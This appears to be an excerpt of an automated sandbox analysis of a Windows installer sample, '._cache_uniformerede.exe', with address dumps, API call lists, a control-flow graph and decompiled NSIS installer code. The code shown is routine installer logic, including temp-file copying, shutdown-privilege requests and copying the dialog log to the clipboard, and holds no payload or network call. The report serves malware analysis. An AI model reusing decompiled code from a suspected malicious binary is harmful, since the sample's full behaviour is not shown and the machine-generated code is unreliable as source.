                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403bef
                                                                                                                                                                                                                            0x00403bef
                                                                                                                                                                                                                            0x00403bf0
                                                                                                                                                                                                                            0x00403bf2
                                                                                                                                                                                                                            0x00403bf3
                                                                                                                                                                                                                            0x00403bf4
                                                                                                                                                                                                                            0x00403bf9
                                                                                                                                                                                                                            0x00403c08
                                                                                                                                                                                                                            0x00403c0a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403c0a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403bf9
                                                                                                                                                                                                                            0x00403bed
                                                                                                                                                                                                                            0x00403b84
                                                                                                                                                                                                                            0x00403b8b
                                                                                                                                                                                                                            0x00403b8b
                                                                                                                                                                                                                            0x004039a1
                                                                                                                                                                                                                            0x00403a48
                                                                                                                                                                                                                            0x00403a48
                                                                                                                                                                                                                            0x00403a54
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a54
                                                                                                                                                                                                                            0x004039b2
                                                                                                                                                                                                                            0x004039ba
                                                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                                                            0x00403a12
                                                                                                                                                                                                                            0x00403a19
                                                                                                                                                                                                                            0x00403a67
                                                                                                                                                                                                                            0x00403a69
                                                                                                                                                                                                                            0x00403a6e
                                                                                                                                                                                                                            0x00403a70
                                                                                                                                                                                                                            0x00403a78
                                                                                                                                                                                                                            0x00403a78
                                                                                                                                                                                                                            0x00403a83
                                                                                                                                                                                                                            0x00403a88
                                                                                                                                                                                                                            0x00403a8f
                                                                                                                                                                                                                            0x00403a95
                                                                                                                                                                                                                            0x00403a97
                                                                                                                                                                                                                            0x00403b6a
                                                                                                                                                                                                                            0x00403b6a
                                                                                                                                                                                                                            0x00403b6a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a9d
                                                                                                                                                                                                                            0x00403a9d
                                                                                                                                                                                                                            0x00403a9f
                                                                                                                                                                                                                            0x00403aa0
                                                                                                                                                                                                                            0x00403aa9
                                                                                                                                                                                                                            0x00403aa2
                                                                                                                                                                                                                            0x00403aa2
                                                                                                                                                                                                                            0x00403aa2
                                                                                                                                                                                                                            0x00403aaf
                                                                                                                                                                                                                            0x00403ab7
                                                                                                                                                                                                                            0x00403abe
                                                                                                                                                                                                                            0x00403ac6
                                                                                                                                                                                                                            0x00403ac6
                                                                                                                                                                                                                            0x00403ad3
                                                                                                                                                                                                                            0x00403adf
                                                                                                                                                                                                                            0x00403ae9
                                                                                                                                                                                                                            0x00403ae9
                                                                                                                                                                                                                            0x00403aeb
                                                                                                                                                                                                                            0x00403af2
                                                                                                                                                                                                                            0x00403afc
                                                                                                                                                                                                                            0x00403b08
                                                                                                                                                                                                                            0x00403b0e
                                                                                                                                                                                                                            0x00403b14
                                                                                                                                                                                                                            0x00403b17
                                                                                                                                                                                                                            0x00403b21
                                                                                                                                                                                                                            0x00403b27
                                                                                                                                                                                                                            0x00403b29
                                                                                                                                                                                                                            0x00403b2d
                                                                                                                                                                                                                            0x00403b3e
                                                                                                                                                                                                                            0x00403b44
                                                                                                                                                                                                                            0x00403b49
                                                                                                                                                                                                                            0x00403b4b
                                                                                                                                                                                                                            0x00403b4e
                                                                                                                                                                                                                            0x00403b54
                                                                                                                                                                                                                            0x00403b54
                                                                                                                                                                                                                            0x00403b4b
                                                                                                                                                                                                                            0x00403b29
                                                                                                                                                                                                                            0x00403b57
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b65
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403b65
                                                                                                                                                                                                                            0x00403a97
                                                                                                                                                                                                                            0x00403a1b
                                                                                                                                                                                                                            0x00403a1e
                                                                                                                                                                                                                            0x00403a22
                                                                                                                                                                                                                            0x00403a27
                                                                                                                                                                                                                            0x00403a29
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a35
                                                                                                                                                                                                                            0x00403a40
                                                                                                                                                                                                                            0x00403a45
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a45
                                                                                                                                                                                                                            0x004039c3
                                                                                                                                                                                                                            0x004039db
                                                                                                                                                                                                                            0x004039ec
                                                                                                                                                                                                                            0x004039ed
                                                                                                                                                                                                                            0x004039f1
                                                                                                                                                                                                                            0x004039f3
                                                                                                                                                                                                                            0x00403a01
                                                                                                                                                                                                                            0x00403a08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a08
                                                                                                                                                                                                                            0x00403a0a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a0a
                                                                                                                                                                                                                            0x0040392d
                                                                                                                                                                                                                            0x00403939
                                                                                                                                                                                                                            0x0040393e
                                                                                                                                                                                                                            0x00403943
                                                                                                                                                                                                                            0x00403945
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040394d
                                                                                                                                                                                                                            0x00403955
                                                                                                                                                                                                                            0x00403966
                                                                                                                                                                                                                            0x0040396e
                                                                                                                                                                                                                            0x00403970
                                                                                                                                                                                                                            0x00403975
                                                                                                                                                                                                                            0x00403977
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403977
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004038d4
                                                                                                                                                                                                                            0x0040387d
                                                                                                                                                                                                                            0x0040387f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403881
                                                                                                                                                                                                                            0x00403885
                                                                                                                                                                                                                            0x00403889
                                                                                                                                                                                                                            0x00403890
                                                                                                                                                                                                                            0x00403890
                                                                                                                                                                                                                            0x00403890
                                                                                                                                                                                                                            0x00403890
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403890
                                                                                                                                                                                                                            0x0040388b
                                                                                                                                                                                                                            0x0040388e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040388e
                                                                                                                                                                                                                            0x00403827
                                                                                                                                                                                                                            0x0040382b
                                                                                                                                                                                                                            0x0040382e
                                                                                                                                                                                                                            0x00403835
                                                                                                                                                                                                                            0x00403835
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403835
                                                                                                                                                                                                                            0x00403830
                                                                                                                                                                                                                            0x00403833
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403833
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403801
                                                                                                                                                                                                                            0x00403801
                                                                                                                                                                                                                            0x00403802
                                                                                                                                                                                                                            0x00403803
                                                                                                                                                                                                                            0x00403803
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403801
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                                                                                                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                                                                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\._cache_uniformerede.exe" ,00000020,"C:\Users\user\Desktop\._cache_uniformerede.exe" ,00000000), ref: 004037E9
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                                                                                                                                                              • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\._cache_uniformerede.exe" ,00000000,?), ref: 00403A8F
                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                                                                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\._cache_uniformerede.exe,00420F08,00000001), ref: 00403B21
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                                                                                                                                                            • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\._cache_uniformerede.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\._cache_uniformerede.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                            • API String ID: 3859024572-1997814850
                                                                                                                                                                                                                            • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                                                                                                                                                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 4059e4-4059f1 144->147 148 4059bc-4059de GetDlgItem CreateThread FindCloseChangeNotification 144->148 166 4058f3-40590d SendMessageW * 2 145->166 167 40590f-405912 145->167 150 4059f3-4059f9 147->150 151 405a0f-405a19 147->151 148->147 153 405a34-405a3d call 40462b 150->153 154 4059fb-405a0a ShowWindow * 2 call 4045f9 150->154 155 405a1b-405a21 151->155 156 405a6f-405a73 151->156 163 405a42-405a46 153->163 154->151 160 405a23-405a2f call 40459d 155->160 161 405a49-405a59 ShowWindow 155->161 156->153 158 405a75-405a7b 156->158 158->153 168 405a7d-405a90 SendMessageW 158->168 160->153 164 405a69-405a6a call 40459d 161->164 165 405a5b-405a64 call 4056ca 161->165 164->156 165->164 166->167 172 405922-405939 call 4045c4 167->172 173 405914-405920 SendMessageW 167->173 174 405b92-405b94 168->174 175 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 168->175 182 40593b-40594f ShowWindow 172->182 183 40596f-405990 GetDlgItem SendMessageW 172->183 173->172 174->163 180 405ac3-405ad3 GetWindowRect 175->180 181 405ad6-405aeb TrackPopupMenu 175->181 180->181 181->174 185 405af1-405b08 181->185 186 405951-40595c ShowWindow 182->186 187 40595e 182->187 183->174 184 405996-4059ae SendMessageW * 2 183->184 184->174 189 405b0d-405b28 SendMessageW 185->189 188 405964-40596a call 4045f9 186->188 187->188 188->183 189->189 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->190 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								_t119 =  *0x422720; // 0x68b77c
								E004056CA( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                                                                                                                                                                            0x00405811
                                                                                                                                                                                                                            0x00405817
                                                                                                                                                                                                                            0x00405821
                                                                                                                                                                                                                            0x00405824
                                                                                                                                                                                                                            0x004059ba
                                                                                                                                                                                                                            0x004059d7
                                                                                                                                                                                                                            0x004059de
                                                                                                                                                                                                                            0x004059de
                                                                                                                                                                                                                            0x004059f1
                                                                                                                                                                                                                            0x00405a0f
                                                                                                                                                                                                                            0x00405a11
                                                                                                                                                                                                                            0x00405a19
                                                                                                                                                                                                                            0x00405a6f
                                                                                                                                                                                                                            0x00405a73
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405a75
                                                                                                                                                                                                                            0x00405a7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405a85
                                                                                                                                                                                                                            0x00405a8d
                                                                                                                                                                                                                            0x00405a90
                                                                                                                                                                                                                            0x00405b92
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405b92
                                                                                                                                                                                                                            0x00405a9f
                                                                                                                                                                                                                            0x00405aaa
                                                                                                                                                                                                                            0x00405ab3
                                                                                                                                                                                                                            0x00405abe
                                                                                                                                                                                                                            0x00405ac1
                                                                                                                                                                                                                            0x00405aca
                                                                                                                                                                                                                            0x00405ad0
                                                                                                                                                                                                                            0x00405ad3
                                                                                                                                                                                                                            0x00405ad3
                                                                                                                                                                                                                            0x00405aeb
                                                                                                                                                                                                                            0x00405af4
                                                                                                                                                                                                                            0x00405af7
                                                                                                                                                                                                                            0x00405afe
                                                                                                                                                                                                                            0x00405b05
                                                                                                                                                                                                                            0x00405b0d
                                                                                                                                                                                                                            0x00405b0d
                                                                                                                                                                                                                            0x00405b24
                                                                                                                                                                                                                            0x00405b24
                                                                                                                                                                                                                            0x00405b2b
                                                                                                                                                                                                                            0x00405b31
                                                                                                                                                                                                                            0x00405b3d
                                                                                                                                                                                                                            0x00405b44
                                                                                                                                                                                                                            0x00405b4d
                                                                                                                                                                                                                            0x00405b4f
                                                                                                                                                                                                                            0x00405b52
                                                                                                                                                                                                                            0x00405b61
                                                                                                                                                                                                                            0x00405b64
                                                                                                                                                                                                                            0x00405b6a
                                                                                                                                                                                                                            0x00405b6b
                                                                                                                                                                                                                            0x00405b71
                                                                                                                                                                                                                            0x00405b72
                                                                                                                                                                                                                            0x00405b73
                                                                                                                                                                                                                            0x00405b7b
                                                                                                                                                                                                                            0x00405b86
                                                                                                                                                                                                                            0x00405b8c
                                                                                                                                                                                                                            0x00405b8c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405aeb
                                                                                                                                                                                                                            0x00405a21
                                                                                                                                                                                                                            0x00405a51
                                                                                                                                                                                                                            0x00405a59
                                                                                                                                                                                                                            0x00405a5b
                                                                                                                                                                                                                            0x00405a64
                                                                                                                                                                                                                            0x00405a64
                                                                                                                                                                                                                            0x00405a6a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405a6a
                                                                                                                                                                                                                            0x00405a25
                                                                                                                                                                                                                            0x00405a2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004059f3
                                                                                                                                                                                                                            0x004059f9
                                                                                                                                                                                                                            0x00405a34
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405a3d
                                                                                                                                                                                                                            0x00405a02
                                                                                                                                                                                                                            0x00405a07
                                                                                                                                                                                                                            0x00405a0a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405a0a
                                                                                                                                                                                                                            0x004059f1
                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                            0x0040582e
                                                                                                                                                                                                                            0x00405836
                                                                                                                                                                                                                            0x0040583a
                                                                                                                                                                                                                            0x0040583d
                                                                                                                                                                                                                            0x00405840
                                                                                                                                                                                                                            0x00405843
                                                                                                                                                                                                                            0x00405846
                                                                                                                                                                                                                            0x00405847
                                                                                                                                                                                                                            0x00405848
                                                                                                                                                                                                                            0x00405861
                                                                                                                                                                                                                            0x00405864
                                                                                                                                                                                                                            0x0040586e
                                                                                                                                                                                                                            0x0040587d
                                                                                                                                                                                                                            0x00405885
                                                                                                                                                                                                                            0x0040588d
                                                                                                                                                                                                                            0x00405892
                                                                                                                                                                                                                            0x00405895
                                                                                                                                                                                                                            0x004058a1
                                                                                                                                                                                                                            0x004058aa
                                                                                                                                                                                                                            0x004058b3
                                                                                                                                                                                                                            0x004058d5
                                                                                                                                                                                                                            0x004058db
                                                                                                                                                                                                                            0x004058ec
                                                                                                                                                                                                                            0x004058f1
                                                                                                                                                                                                                            0x004058ff
                                                                                                                                                                                                                            0x0040590d
                                                                                                                                                                                                                            0x0040590d
                                                                                                                                                                                                                            0x00405912
                                                                                                                                                                                                                            0x00405920
                                                                                                                                                                                                                            0x00405920
                                                                                                                                                                                                                            0x00405925
                                                                                                                                                                                                                            0x00405928
                                                                                                                                                                                                                            0x0040592d
                                                                                                                                                                                                                            0x00405939
                                                                                                                                                                                                                            0x00405942
                                                                                                                                                                                                                            0x0040594f
                                                                                                                                                                                                                            0x0040595e
                                                                                                                                                                                                                            0x00405951
                                                                                                                                                                                                                            0x00405956
                                                                                                                                                                                                                            0x00405956
                                                                                                                                                                                                                            0x0040596a
                                                                                                                                                                                                                            0x0040596a
                                                                                                                                                                                                                            0x0040597e
                                                                                                                                                                                                                            0x00405987
                                                                                                                                                                                                                            0x00405990
                                                                                                                                                                                                                            0x004059a0
                                                                                                                                                                                                                            0x004059ac
                                                                                                                                                                                                                            0x004059ac
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405867
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405876
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 004058B3
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 004058BA
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405977
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405885
                                                                                                                                                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 004059C9
                                                                                                                                                                                                                            • CreateThread.KERNELBASE ref: 004059D7
                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004059DE
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405A96
                                                                                                                                                                                                                            • AppendMenuW.USER32 ref: 00405AAA
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00405ACA
